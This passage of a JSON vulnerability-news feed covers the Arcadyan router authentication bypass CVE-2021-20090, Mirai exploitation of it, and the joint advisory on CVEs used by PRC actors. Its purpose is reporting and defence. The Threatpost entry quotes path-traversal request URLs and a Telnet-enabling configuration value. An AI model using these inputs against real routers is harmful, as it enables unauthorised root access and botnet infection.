those targeted at SonicWall SSL-VPNs, D-Link DNS-320 firewalls, Netis WF2419 wireless routers, and Netgear ProSAFE Plus switches.\n\nTo avoid any potential compromise, users are recommended to update their router firmware to the latest version.\n\n\"It is clear that threat actors keep an eye on all disclosed vulnerabilities. Whenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T09:27:00", "type": "thn", "title": "Hackers Exploiting New Auth Bypass Bug Affecting Millions of Arcadyan Routers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-11T03:38:35", "id": "THN:EE1B4CCBFEA2E4D18964A709469ABD37", "href": "https://thehackernews.com/2021/08/hackers-exploiting-new-auth-bypass-bug.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-08-09T19:54:43", "description": "An authentication-bypass vulnerability affecting multiple routers and internet-of-things (IoT) devices is being actively exploited in the wild, according to researchers.\n\nThe security flaw, tracked as CVE-2021-20090, was disclosed last week by researchers at Tenable. It affects devices from 20 different vendors and ISPs (ADB, Arcadyan, ASMAX, ASUS, Beeline, British Telecom, Buffalo, Deutsche Telekom, HughesNet, KPN, O2, Orange, Skinny, SparkNZ, Telecom [Argentina], TelMex, Telstra, Telus, Verizon and Vodafone), all of which use the same firmware from Arcadyan. In all, millions of devices worldwide could be vulnerable.\n\nTenable [demonstrated](<https://www.tenable.com/security/research/tra-2021-13>) in a proof of concept (PoC) that it\u2019s possible to modify a device\u2019s configuration to enable Telnet on a vulnerable router and gain root level shell access to the device.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe vulnerability exists due to a list of folders which fall under a \u2018bypass list\u2019 for authentication,\u201d according to Tenable\u2019s advisory on August 3. \u201cFor most of the devices listed, that means that the vulnerability can be triggered by multiple paths. For a device in which http://<ip>/index.htm requires authentication, an attacker could access index.htm using the following paths:\n\n * http://<ip>/images/..%2findex.htm\n * http://<ip>/js/..%2findex.htm\n * http://<ip>/css/..%2findex.htm\n\n\u201cTo have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal,\u201d the advisory continued.\n\n## **Exploited to Spread Mirai Variant**\n\nJust three days after disclosure, on Friday, cybersecurity researchers from Juniper Networks said they had discovered active exploitation of the bug.\n\n\u201cWe have identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China,\u201d they wrote [in a post](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>). \u201cThe attacker seems to be attempting to deploy a [Mirai variant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) on the affected routers.\u201d\n\nCleaving close to Tenable\u2019s PoC, the attackers are modifying the configuration of the attacked device to enable Telnet using \u201cARC_SYS_TelnetdEnable=1\u201d to take control, according to Juniper. Then, they proceed to download the Mirai variant from a command-and-control (C2) server and execute it.\n\nMirai is a long-running botnet that infects connected devices and can be used to mount distributed denial-of-service (DDoS) attacks. It [burst on the scene](<https://threatpost.com/mirai-masterminds-helping-fbi-snuff-out-cybercrime/137556/>) in 2016, when it overwhelmed servers at the Dyn web hosting company, taking down more than 1,200 websites, including Netflix and Twitter. Its source code [was leaked](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) later that year, after which multiple Mirai variants began to crop up, in a barrage that continues to this day.\n\nSome of the scripts in the current set of attacks bear resemblance to previously observed activity picked up in February and March, according to Juniper.\n\n\u201cThe similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\u201d researchers wrote. \u201cGiven that most people may not even be aware of the security risk and won\u2019t be upgrading their device anytime soon, this attack tactic can be very successful, cheap and easy to carry out.\u201d\n\nIn addition to the router bug, Juniper researchers observed the following known vulnerabilities being exploited to gain initial access to target devices:\n\n * CVE-2020-29557 (DLink routers)\n * CVE-2021-1497 and CVE-2021-1498 (Cisco HyperFlex)\n * CVE-2021-31755 (Tenda AC11)\n * CVE-2021-22502 (MicroFocus OBR)\n * CVE-2021-22506 (MicroFocus AM)\n\nIn fact, the attackers have been continuously adding new exploits to its arsenal, according to the posting, and CVE-2021-20090 is unlikely to be the last.\n\n\u201cIt is clear that threat actors keep an eye on all disclosed vulnerabilities,\u201d researchers concluded. \u201cWhenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks.\u201d\n\nTo avoid compromise, users should update their firmware on the router.\n\n\u201cIn the case of IoT devices or home gateways, the situation is much worse as most users are not tech-savvy and even those who are do not get informed about potential vulnerabilities and patches to apply,\u201d according to Juniper. \u201cThe only sure way to remedy this issue is to require vendors to offer zero-down-time automatic updates.\u201d\n\n**![Threatpost Webinar Series ](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/27093135/threatpost-webinar-300x51.jpg)Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-09T19:41:30", "type": "threatpost", "title": "Auth Bypass Bug Exploited, Millions of Routers Affected", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-09T19:41:30", "id": "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E", "href": "https://threatpost.com/auth-bypass-bug-routers-exploited/168491/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-10-12T20:01:11", "description": "On October 6, 2022, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>) on the Chinese government\u2014officially known as the People\u2019s Republic of China (PRC) states-sponsored cyber actors' activity to seek national interests. These malicious cyber activities attributed to the Chinese government targeted, and persist to target, a mixture of industries and organizations in the United States. They provide the top CVEs used since 2020 by the People's Republic of China (PRC) states-sponsored cyber actors as evaluated by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). The PRC malicious actor continues to exploit known vulnerabilities to target U.S. and vigorously allied networks and software and hardware companies to rob intellectual property and develop access to sensitive networks. \n\nThey stated that PRC state-sponsored cyber activities as one of the most significant and dynamic threats to U.S. government and civilian networks. The PRC state-sponsored cyber actors persist in targeting government and critical infrastructure networks with an increasing array of new and adaptive techniques. Some could pose a considerable risk to Information Technology Sector, telecommunications organizations, Defense Industrial Base (DIB) Sector, and other critical infrastructure organizations. \n\nPRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target victims. Here is a list of 20 publicly known vulnerabilities (CVEs) published by the NSA, along with affected products and associated Qualys VMDR QID(s) for each vulnerability: \n\n**Vendor**| **CVE**| **Vulnerability Type**| Qualys **QID**(s) \n---|---|---|--- \n| | | \nApache Log4j | CVE-2021-44228 | Remote Code Execution | 730302, 150441, 150440, and more \nPulse Connect Secure | CVE-2019-11510 | Arbitrary File Read | 38771 \nGitLab CE/EE | CVE-2021-22205 | Remote Code Execution | 375475 \nAtlassian | CVE-2022-26134 | Remote Code Execution | 730514, 376657, 150523 \nMicrosoft Exchange | CVE-2021-26855 | Remote Code Execution | 50107, 50108 \nF5 Big-IP | CVE-2020-5902 | Remote Code Execution | 38791, 373106 \nVMware vCenter Server | CVE-2021-22005 | Arbitrary File Upload | 216265, 216266 \nCitrix ADC | CVE-2019-19781 | Path Traversal | 372685, 150273, 372305 \nCisco Hyperflex | CVE-2021-1497 | Command Line Execution | 730070 \nBuffalo WSR | CVE-2021-20090 | Relative Path Traversal | NA \nAtlassian Confluence Server and Data Center | CVE-2021-26084 | Remote Code Execution | 150368, 375839, 730172 \nHikvision Webserver | CVE-2021-36260 | Command Injection | NA \nSitecore XP | CVE-2021-42237 | Remote Code Execution | 14012 \nF5 Big-IP | CVE-2022-1388 | Remote Code Execution | 150511, 730489, 376577 \nApache | CVE-2022-24112 | Authentication Bypass by Spoofing | 730361 \nZOHO | CVE-2021-40539 | Remote Code Execution | 375840 \nMicrosoft | CVE-2021-26857 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-26858 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-27065 | Remote Code Execution | 50107 \nApache HTTP Server | CVE-2021-41773 | Path Traversal | 150373, 150372, 710595 and more \nTable 1: Top CVEs most used by Chinese state-sponsored cyber actors since 2020 \n\nNSA stated that the threat actors use virtual private networks (VPNs) to obscure their activities and establish initial access. Multiple CVEs indicated in Table 1 let the actors stealthily acquire unauthorized access into sensitive networks, after which they pursue to develop persistence and reposition laterally to other internally connected networks. \n\nThe NSA highlights how the People\u2019s Republic of China (PRC) has targeted and compromised significant telecom establishments and network service providers mostly by exploiting publicly known vulnerabilities. Networks affected have varied from small office/home office (SOHO) routers to medium and large enterprise networks. \n\nPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. The devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as means to conduct network intrusions on other entities. Furthermore, cyber defenders often overlook these devices, who work to maintain and keep pace with frequent software patching of Internet-facing services and endpoint devices. \n\n## Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0 \n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), Vulnerabilities tab by using the following QQL query: \n\n_vulnerabilities.vulnerability.cveIds: [CVE-2021-44228, CVE-2019-11510, CVE-2021-22205, CVE-2022-26134, CVE-2021-26855, CVE-2020-5902, CVE-2021-22005, CVE-2019-19781, CVE-2021-1497, CVE-2021-20090, CVE-2021-26084, CVE-2021-36260, CVE-2021-42237, CVE-2022-1388, CVE-2022-24112, CVE-2021-40539, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-41773]_ \n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2022/10/Vulnerabilities-Tab-1070x602.png)\n\nUsing, [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), you can also effectively prioritize these vulnerabilities using the [Qualys TruRisk](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>).\n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2022/10/Prioritization-1070x602.png)\n\n## Identify Vulnerable Assets using Qualys Threat Protection \n\nIn addition, you can locate vulnerable hosts through Qualys Threat Protection by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability. \n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2022/10/Threat-Protection-1070x660.png)\n\nUsing the Qualys Unified Dashboard, you can track, impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment. \n\nRead the Article (Qualys Customer Portal): [NSA Top Exploited CVEs | China State Actors](<https://success.qualys.com/support/s/article/000007011>) \n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2022/10/NSA-TOP-CVES-1070x1215.jpg)\n\n## Recommendations & Mitigations \n\nThe NSA, CISA, and FBI recommend U.S. and allied governments, critical infrastructure, and private sector organizations use the mitigation guidance provided to boost their defensive posture and decrease the threat of compromise from PRC state-sponsored threat cyber actors. \n\nHere is a summary of mitigations guidance provided by the NSA: \n\n * Update, prioritize and patch vulnerable systems as soon as possible, as listed in this article and the list provided by [CISA KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n * Utilize phishing-resistant multi-factor authentication and require all accounts with a unique and strong password. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices. \n * Move toward the Zero Trust security model. \n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\nOne of the soundest methods that organizations of all sizes could stay on top of these vulnerabilities and end-of-life (EOL) network/device infrastructure as noted by NSA general mitigations guidelines is to catalog the infected assets and apply patches as soon as possible. This could be an effortless process if the corps utilize the power of Qualys VMDR 2.0. You can start your [Qualys VMDR 2.0 trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting, and patching the high-priority commonly exploited vulnerabilities. \n\n## Contributors\n\n * Felix Jimenez Saez, Director, Product Management, Qualys\n * Swapnil Ahirrao, Principal Product Manager, VMDR, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-07T20:03:01", "type": "qualysblog", "title": "NSA Alert: Topmost CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-07T20:03:01", "id": "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2023-04-23T15:50:43", "description": "Hello everyone! This episode will be about the new hot twenty vulnerabilities from CISA, NSA and FBI, [Joint cybersecurity advisory (CSA) AA22-279A](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>), and how I analyzed these vulnerabilities using my open source project [Vulristics](<https://github.com/leonov-av/vulristics>). \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239105>\n\nAmericans can't just release a list of "20 vulnerabilities most commonly exploited in attacks on American organizations." They like to add geopolitics and point the finger at some country. Therefore, I leave the attack attribution mentioned in the advisory title without comment.\n\nBut I like such lists of vulnerabilities for a number of reasons:\n\n * Such lists of **vulnerabilities** show which CVEs need to be addressed. This is the most obvious. If you notice vulnerabilities from the list in your infrastructure, start fixing them as soon as possible.\n * Such lists of vulnerabilities show the **software and hardware products** that are most important to monitor. This means that your vulnerability scanner must support this software very well. Make sure you can verify this.\n * Such lists of vulnerabilities show **groups of software and hardware products **that need to be monitored first. Usually these are products that are available to a wide range of users and are inconvenient to upgrade.\n * Such lists of vulnerabilities show **the types of vulnerabilities** that you need to pay attention to first.\n * Such lists of vulnerabilities are relatively compact and **can be easily analyzed** even manually.\n\nI can't help but notice that the quality of the advisory is not very high. For example, the description of vulnerabilities was automatically taken from NVD. Including this: \n\n"Microsoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078". \n\nNot very informative, right? This joint advisory was released by three big serious organizations. They could work harder and write a unique text for each of the 20 CVEs. But no one seems to care.\n\nHere is a list of all vulnerabilities from the advisory:\n\n 1. Apache Log4j CVE-2021-44228 Remote Code Execution\n 2. Pulse Connect Secure CVE-2019-11510 Arbitrary File Read\n 3. GitLab CE/EE CVE-2021-22205 Remote Code Execution\n 4. Atlassian CVE-2022-26134 Remote Code Execution\n 5. Microsoft Exchange CVE-2021-26855 Remote Code Execution\n 6. F5 Big-IP CVE-2020-5902 Remote Code Execution\n 7. VMware vCenter Server CVE-2021-22005 Arbitrary File Upload\n 8. Citrix ADC CVE-2019-19781 Path Traversal\n 9. Cisco Hyperflex CVE-2021-1497 Command Line Execution\n 10. Buffalo WSR CVE-2021-20090 Relative Path Traversal\n 11. Atlassian Confluence Server and Data Center CVE-2021-26084 Remote Code Execution\n 12. Hikvision Webserver CVE-2021-36260 Command Injection\n 13. Sitecore XP CVE-2021-42237 Remote Code Execution\n 14. F5 Big-IP CVE-2022-1388 Remote Code Execution\n 15. Apache CVE-2022-24112 Authentication Bypass by Spoofing\n 16. ZOHO CVE-2021-40539 Remote Code Execution\n 17. Microsoft CVE-2021-26857 Remote Code Execution\n 18. Microsoft CVE-2021-26858 Remote Code Execution\n 19. Microsoft CVE-2021-27065 Remote Code Execution\n 20. Apache HTTP Server CVE-2021-41773 Path Traversal\n\nOf course, I did not deny myself the pleasure of using this list of CVEs as input for my [Vulristics vulnerability prioritization tool](<https://github.com/leonov-av/vulristics>). Just to see how Vulristics handles it and tweak Vulristics if needed.\n\nHere is the command I used to generate the report:\n \n \n $ python3.8 vulristics.py --report-type \"cve_list\" --cve-project-name \"AA22-279A\" --cve-list-path joint_cves.txt --cve-data-sources \"ms,nvd,vulners,attackerkb\" --cve-comments-path comments.txt --rewrite-flag \"True\"\n\nThe full report is here: <https://avleonov.com/vulristics_reports/aa22-279a_report_with_comments_ext_img.html>\n\n## Vulnerable Products\n\nIf you look at the list of vulnerable software and hardware products, then some of them, obviously, should have been included in this advisory. Because lately there have been a lot of publications about how attackers exploit the vulnerabilities in these products:\n\n * Apache HTTP Server\n * Apache Log4j2\n * GitLab\n * Microsoft Exchange\n * Confluence Server\n * Zoho ManageEngine ADSelfService Plus\n * Pulse Connect Secure\n\nThe second group of products. For them, there were also publications about attacks. But it seems that these are more niche products and are less perceived as targets for attackers:\n\n * BIG-IP\n * Citrix Application Delivery Controller\n * VMware vCenter\n * Cisco HyperFlex HX\n\nAnd finally, there are quite exotic products that apparently reflect the specifics of American IT:\n\n * Sitecore Experience Platform (XP)\n * Hikvision Web Server\n * Apache APISIX\n * Buffalo WSR\n\n## Criticality of Vulnerabilities\n\nVulristics has identified all vulnerabilities as vulnerabilities of the highest criticality level (Urgent). Vulristics found public exploits for all vulnerabilities.\n\nAt the same time, if you look at CVSS, then there is this:\n\nAll vulnerabilities: 20 \nCritical: 16 \nHigh: 4 \nMedium: 0 \nLow: 0\n\nSo if you are using CVSS for prioritization, don't forget about the High level vulnerabilities.\n\n## Detected Types of Vulnerabilities\n\n * Remote Code Execution\n * Command Injection\n * Arbitrary File Reading\n * Authentication Bypass\n * Path Traversal\n\nAs we can see, all vulnerabilities are obviously critical except for one "Path Traversal":\n\nPath Traversal - Citrix Application Delivery Controller (CVE-2019-19781)\n\nThe description of the vulnerability leaves no room for detecting another type:\n\n"An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal".\n\nThe same type is indicated in the advisory AA22-279A: Citrix ADC CVE-2019-19781 Path Traversal\n\nAnd only [in the description of the exploit](<https://github.com/trustedsec/cve-2019-19781>) we can see that this is in fact RCE: "This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for **remote code execution**."\n\nWell, this is another reminder to us that we should not do hard filtering by vulnerability type. It's also not a good idea to trust the description from NVD. The type of vulnerability may change over time, and no one will make changes to the description in NVD.\n\nIn some cases, Vulristics can help to more accurately determine the type of vulnerability:\n\nAA22-279A: Apache HTTP Server CVE-2021-41773 Path Traversal \nVulristics: Remote Code Execution - Apache HTTP Server (CVE-2021-41773)\n\nWhy? Because we can read in the description: "If CGI scripts are also enabled for these aliased pathes, this could allow for **remote code execution**."\n\nBut of course Vulristics is not a silver bullet. It is difficult to come up with something here other than manual analysis of publications about vulnerabilities and exploits.\n\nI also cannot help but point out that for some of the vulnerabilities, Vulrisitcs determined the types of vulnerabilities more correctly in accordance with the description:\n\nAA22-279A: GitLab CE/EE CVE-2021-22205 Remote Code Execution \nVulristics: Command Injection - GitLab (CVE-2021-22205) - Urgent [947] \n"\u2026 which resulted in a **remote command execution**."\n\nAA22-279A: Sitecore XP CVE-2021-42237 Remote Code Execution \nVulristics: Command Injection - Sitecore Experience Platform (XP) (CVE-2021-42237) \n"\u2026 it is possible to achieve **remote command execution** on the machine."\n\nAA22-279A: VMware vCenter Server CVE-2021-22005 Arbitrary File Upload \nVulristics: Remote Code Execution - VMware vCenter (CVE-2021-22005) \n"\u2026may exploit this issue **to execute code** on vCenter Server by uploading a specially crafted file."\n\nAA22-279A: F5 Big-IP CVE-2022-1388 Remote Code Execution \nVulristics: Authentication Bypass - BIG-IP (CVE-2022-1388) \n\u2026 undisclosed requests **may bypass** iControl REST **authentication**"\n\nAA22-279A: Apache HTTP Server CVE-2021-41773 Path Traversal \nVulristics: Remote Code Execution - Apache HTTP Server (CVE-2021-41773) \n"\u2026 this could allow for **remote code execution**."\n\nAA22-279A: Apache CVE-2022-24112 Authentication Bypass by Spoofing \nVulristics: Remote Code Execution - Apache APISIX (CVE-2022-24112) \n"\u2026 is vulnerable to **remote code execution**."\n\nAA22-279A: Buffalo WSR CVE-2021-20090 Relative Path Traversal \nVulristics: Authentication Bypass - Buffalo WSR (CVE-2021-20090) \n"\u2026 allow unauthenticated remote attackers to **bypass authentication**."\n\nTherefore, do not rush to trust the vulnerability type from the [CISA Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and take it into account when prioritizing vulnerabilities.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-21T20:10:13", "type": "avleonov", "title": "Joint Advisory AA22-279A and Vulristics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-21T20:10:13", "id": "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246", "href": "https://avleonov.com/2022/10/21/joint-advisory-aa22-279a-and-vulristics/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-05-27T16:26:45", "description": "### Summary\n\nThis joint Cybersecurity Advisory (CSA) provides the top Common Vulnerabilities and Exposures (CVEs) used since 2020 by People\u2019s Republic of China (PRC) state-sponsored cyber actors as assessed by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). PRC state-sponsored cyber actors continue to exploit known vulnerabilities to actively target U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks.\n\nThis joint CSA builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\n\nNSA, CISA, and FBI urge U.S. and allied governments, critical infrastructure, and private sector organizations to apply the recommendations listed in the Mitigations section and Appendix A to increase their defensive posture and reduce the threat of compromise from PRC state-sponsored malicious cyber actors.\n\nFor more information on PRC state-sponsored malicious cyber activity, see CISA\u2019s [China Cyber Threat Overview and Advisories webpage](<https://www.cisa.gov/uscert/china>), FBI\u2019s [Industry Alerts](<https://www.ic3.gov/Home/IndustryAlerts>), and NSA\u2019s [Cybersecurity Advisories & Guidance](<https://www.nsa.gov/Press-Room/Cybersecurity-Advisories-Guidance/>). \n\nDownload the PDF version of this report: [pdf, 409 KB](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>)\n\n### Technical Details\n\nNSA, CISA, and FBI continue to assess PRC state-sponsored cyber activities as being one of the largest and most dynamic threats to U.S. government and civilian networks. PRC state-sponsored cyber actors continue to target government and critical infrastructure networks with an increasing array of new and adaptive techniques\u2014some of which pose a significant risk to Information Technology Sector organizations (including telecommunications providers), Defense Industrial Base (DIB) Sector organizations, and other critical infrastructure organizations.\n\nPRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target networks of interest. NSA, CISA, and FBI assess PRC state-sponsored cyber actors have actively targeted U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks. See Table 1 for the top used CVEs.\n\n_Table I: Top CVEs most used by Chinese state-sponsored cyber actors since 2020_\n\nVendor\n\n| \n\nCVE\n\n| \n\nVulnerability Type \n \n---|---|--- \n \nApache Log4j\n\n| \n\nCVE-2021-44228\n\n| \n\nRemote Code Execution \n \nPulse Connect Secure\n\n| \n\nCVE-2019-11510\n\n| \n\nArbitrary File Read \n \nGitLab CE/EE\n\n| \n\nCVE-2021-22205\n\n| \n\nRemote Code Execution \n \nAtlassian\n\n| \n\nCVE-2022-26134\n\n| \n\nRemote Code Execution \n \nMicrosoft Exchange\n\n| 